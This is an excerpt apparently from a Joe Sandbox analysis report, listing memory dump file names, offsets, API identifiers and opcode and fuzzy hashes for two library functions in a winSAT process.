                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: free
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                                                              • Opcode ID: a3018fbadf63781a8fc01af4f133ba02a119e3f3989533b131c35cfd6a572e03
                                                                                                                                                                                              • Instruction ID: a5a50e261df395c290210bf04b3b65ce06c48999288d11ddda6c09b72bcd06e8
                                                                                                                                                                                              • Opcode Fuzzy Hash: a3018fbadf63781a8fc01af4f133ba02a119e3f3989533b131c35cfd6a572e03
                                                                                                                                                                                              • Instruction Fuzzy Hash: CDF0123260CA02C5EB55BB15F851178F364BB48B95BB48030D95D877A1DF7CF491C720
                                                                                                                                                                                              Function 00007FF7810A4540 Relevance: 1.3, APIs: 1, Instructions: 27COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ??0exception@@malloc
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2247021969-0
                                                                                                                                                                                              • Opcode ID: 76cfbf612e463d9656a2923573785b85223aca226bb1495acb75d289b6c0b204
                                                                                                                                                                                              • Instruction ID: a0118152f85b2a8f47465d4cc504feb8458b7a9ac0456da3be802b0fd84cd859
                                                                                                                                                                                              • Opcode Fuzzy Hash: 76cfbf612e463d9656a2923573785b85223aca226bb1495acb75d289b6c0b204
                                                                                                                                                                                              • Instruction Fuzzy Hash: 17E01251E1920741EF54B6229C110B8E3517F94740FFC8030DA9F496D2ED9CE905C330